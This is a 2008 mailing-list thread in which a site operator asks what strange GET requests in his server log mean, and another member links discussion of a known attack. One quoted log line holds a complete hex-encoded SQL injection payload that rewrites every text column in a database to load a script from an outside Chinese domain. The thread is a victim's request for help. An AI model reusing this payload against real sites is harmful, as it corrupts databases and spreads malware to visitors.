Further discussion including a translation of the hex string here:
http://wordpress.org/support/topic/195497 (01)
A quick google of a snippet of that query got this
http://web-robot-abuse.blogspot.com/2008/08/latest-hack-running-right-now-is.html
> The latest hack running right now is a injection atempt using a string like
>this.
>
>
>DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);
>
> Update hackers.txt file right now. (02)
Not really certain what all that means. (03)
Jack (04)
Adrian Walker wrote:
> Hi All --
>
> Your expert advice please.
>
> On our website [1], we support a kind of Wiki for business rules and
> facts, written in executable English.
>
> The site can also be used as an SOA endpoint.
>
> One of the sets of rules and facts on the site is a version of the
> FeaReferenceModelOntology.
>
> We are seeing incoming GET commands like the one listed below.
>
> [15/Aug/2008:13:10:57 -0400] "GET
>
>/demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B65202727 (05)
25223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); (06)
> HTTP/1.1" 200 620290
>
> The commands originate from many different sites around the internet,
> and we have not been able to find out why they are being sent.
>
> Does anyone know please what these commands are trying to do? Or are
> they simply buffer overflow attack attempts?
>
> Thanks for your kind thoughts about this, and apologies for cross posting.
>
> -- Adrian
>
> [1] Internet Business Logic
> A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL
> and RDF
> Online at www.reengineeringllc.com <http://www.reengineeringllc.com>
> Shared use is free
>
> Adrian Walker
> Reengineering
>
>
> ------------------------------------------------------------------------
>
>
> _________________________________________________________________
> Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/
> Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/
> Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx
> Shared Files: http://ontolog.cim3.net/file/
> Community Wiki: http://ontolog.cim3.net/wiki/
> To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx
> (07)
_________________________________________________________________
Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/
Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/
Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx
Shared Files: http://ontolog.cim3.net/file/
Community Wiki: http://ontolog.cim3.net/wiki/
To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx (08)
|